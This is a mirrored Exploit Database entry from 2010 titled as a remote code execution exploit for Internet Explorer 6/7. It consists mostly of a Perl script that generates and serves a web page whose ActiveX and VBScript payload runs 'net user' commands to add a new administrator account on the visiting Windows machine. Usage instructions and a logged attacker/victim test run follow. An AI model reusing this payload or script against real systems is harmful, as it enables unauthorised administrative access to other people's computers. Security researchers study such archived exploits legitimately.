Microsoft Internet Explorer 6/7 – Remote Code Execution (Remote User Add)

• Exploit Database
• 104 阅读

• 作者： Sioma Labs
  日期： 2010-02-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11457/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220

  # Exploit Title: Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit # Date: 15/02/2010 # Author: Sioma Labs # Software Link: N/A # Version: IE 7 # Tested on: Windows XP sp2 # CVE : # Code : #!/usr/bin/perl use strict; use Socket; use IO::Socket; print "\n"; print "800008 8\n"; print "8eeeeee eeeeeee eeeee8 eeeee eeeeeeeeee\n"; print "8eeeee 8888 888 8 88e8 8 8 88 | \n"; print "88 8e 8 8 8e 88 8eee8888eee8 8eee8e 8eeee \n"; print "e 88 88 8 8 88 88 88888888 88 888 \n"; print "8eee88 88 8eee8 88 88 88888eee 888 88eee8 8ee88 \n"; print "-----------------------------------------------------------\n"; print " Useage : $0 Port \n"; print " Please Read the Instruction befor you use this \n"; print " ---------------------------------\n"; sub parse_form { my $data = $_[0]; my %data; foreach (split /&/, $data) { my ($key, $val) = split /=/; $val =~ s/\+/ /g; $val =~ s/%(..)/chr(hex($1))/eg; $data{$key} = $val;} return %data; } my $port = shift; defined($port) or die "Usage: $0 Port \n"; mkdir("public_html", 0777) || print $!; my $DOCUMENT_ROOT = $ENV{&apos;HOME&apos;} . "/public_html"; print " [+] Account Name : "; chomp(my $acc=<STDIN>); print " [+] Account Password : "; chomp(my $pass=<STDIN>); print " [+] Your IP : "; chomp (my $ip=<STDIN>); #------------- Exploit ----------------- my $iexplt= "public_html/index.html"; open (myfile, ">>$iexplt"); print myfile "<html>\n"; print myfile "<title> IE User Add Test </title>\n"; print myfile "<head>"; print myfile "</font></b></p>\n"; print myfile "<p>\n"; print myfile "<object classid=&apos;clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8&apos; id=&apos;exploit&apos;\n"; print myfile"></object>\n"; print myfile"<script language=&apos;vbscript&apos;>\n"; print myfile"adduser="; print myfile &apos;"cmd&apos;; print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc "; print myfile &apos;/add"&apos;; print myfile "\n"; print myfile "exploit.run adduser \n"; print myfile "\n </script></p>\n"; print " [+] ----------------------------------------\n"; print " [-] Link Genetrated : http://$ip:$port/index.html\n"; close (myfile); #------------------------------------ my $server = new IO::Socket::INET(Proto => &apos;tcp&apos;, LocalPort => $port, Listen => SOMAXCONN, Reuse => 1); $server or die "Unable to create server socket: $!" ; while (my $client = $server->accept()) { $client->autoflush(1); my %request = (); my %data; { local $/ = Socket::CRLF; while (<$client>) { chomp; if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) { $request{METHOD} = uc $1; $request{URL} = $2; $request{HTTP_VERSION} = $3; } elsif (/:/) { (my $type, my $val) = split /:/, $_, 2; $type =~ s/^\s+//; foreach ($type, $val) { s/^\s+//; s/\s+$//; } $request{lc $type} = $val; } elsif (/^$/) { read($client, $request{CONTENT}, $request{&apos;content-length&apos;}) if defined $request{&apos;content-length&apos;}; last; } } } if ($request{METHOD} eq &apos;GET&apos;) { if ($request{URL} =~ /(.*)\?(.*)/) { $request{URL} = $1; $request{CONTENT} = $2; %data = parse_form($request{CONTENT});   } else { %data = ();   } $data{"_method"} = "GET"; } elsif ($request{METHOD} eq &apos;POST&apos;) { %data = parse_form($request{CONTENT});   $data{"_method"} = "POST"; } else { $data{"_method"} = "ERROR"; } my $localfile = $DOCUMENT_ROOT.$request{URL}; if (open(FILE, "<$localfile")) { print $client "HTTP/1.0 200 OK", Socket::CRLF; print $client "Content-type: text/html", Socket::CRLF; print $client Socket::CRLF; my $buffer; while (read(FILE, $buffer, 4096)) { print $client $buffer; } $data{"_status"} = "200"; } else { print $client "HTTP/1.0 404 Not Found", Socket::CRLF; print $client Socket::CRLF; print $client "<html><body>404 Not Found</body></html>"; $data{"_status"} = "404"; } close(FILE); print ($DOCUMENT_ROOT.$request{URL},"\n"); foreach (keys(%data)) { print (" $_ = $data{$_}\n"); } close $client; # Sioma Labs # http://siomalabs.com # Sioma Agent 154 } #Instructions #----------- # # This has been tested on windows envirnment(VisTa) . and the victom OS was windows xp sp2 ( InterNET eXplorer 7 ) # To use this on remote PC the generated link should be on victims trusted site list (tools >Internet Option> Security > Trusted Site> Sites) # No requrement to run it locally . just open the exploit(public_html/index.html) with the IE # Test Run ( Used OS : Vista) / ( Victim Os : XP SP2 ) # ------------------------------------------------------------- # # Attacker # ============= # # # E:\>ie.pl 123 # #800008 8 #8eeeeee eeeeeee eeeee8 eeeee eeeeeeeeee #8eeeee 8888 888 8 88e8 8 8 88 | #88 8e 8 8 8e 88 8eee8888eee8 8eee8e 8eeee #e 88 88 8 8 88 88 88888888 88 888 #8eee88 88 8eee8 88 88 88888eee 888 88eee8 8ee88 #----------------------------------------------------------- # Useage : E:\ie.pl Port # Please Read the Instruction befor you use this \n"; # --------------------------------- #[+] Account Name : test # [+] Account Password : test # [+] Your IP : 192.168.1.102 # [+] ---------------------------------------- # [-] Link Genetrated : http://192.168.1.102:123/index.html # #------------------------------------------------------------> # Not Tested on Linux ( Should Work on it too) # # # Victim #======== # Befor - # C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #AdministratorSiomaPCGuest #HelpAssistantSUPPORT_388945a0 #The command completed successfully. # # After - #C:\>net user # #User accounts for \\PC-00583E3C730C # #------------------------------------------------------------------------------- #AdministratorSiomaPCGuest #HelpAssistantSUPPORT_388945a0test #The command completed successfully. # #C:\> # ============================================================================ # The "test" user has been created successfully # # Delete The "Public_Html\index.html" If you use this for the 2nd time